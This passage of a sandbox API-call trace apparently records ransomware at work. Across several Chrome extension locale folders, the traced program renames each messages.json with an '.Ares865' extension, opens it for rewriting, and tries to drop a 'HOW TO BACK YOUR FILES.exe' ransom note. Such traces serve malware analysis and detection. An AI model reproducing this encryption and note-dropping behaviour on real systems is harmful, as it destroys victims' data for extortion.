dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.463] GetLastError () returned 0x0 [0103.463] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.463] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8655f830, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4efb7a00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4efb7a00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.463] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.463] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.464] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json.Ares865") returned 160 [0103.464] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.465] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.465] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=221) returned 1 [0103.469] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr" [0103.469] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr" [0103.469] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.469] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.470] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.470] GetLastError () returned 0x0 [0103.470] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.470] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8655f830, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4efb7a00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4efb7a00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.470] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.470] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.471] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json.Ares865") returned 160 [0103.471] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.472] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.472] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=215) returned 1 [0103.479] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil" [0103.479] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil" [0103.479] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.479] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.480] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.480] GetLastError () returned 0x0 [0103.480] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.480] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8655f830, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4efb7a00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4efb7a00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.480] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.480] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.480] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json.Ares865") returned 161 [0103.481] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.482] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.482] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=219) returned 1 [0103.485] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi" [0103.485] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi" [0103.485] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.485] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.486] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.486] GetLastError () returned 0x0 [0103.487] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.487] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8655f830, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4efddb60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4efddb60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.487] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.487] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.487] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json.Ares865") returned 160 [0103.487] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.488] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.489] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=216) returned 1 [0103.492] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et" [0103.493] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et" [0103.493] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.493] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.494] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.494] GetLastError () returned 0x0 [0103.495] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.495] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8655f830, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4efddb60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4efddb60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.495] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.495] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.495] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json.Ares865") returned 160 [0103.495] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.497] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.497] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=216) returned 1 [0103.501] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419" [0103.501] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419" [0103.501] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.501] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.502] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.502] GetLastError () returned 0x0 [0103.502] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.502] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x865396d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4efddb60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4efddb60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.503] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.503] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.503] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json.Ares865") returned 164 [0103.503] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local 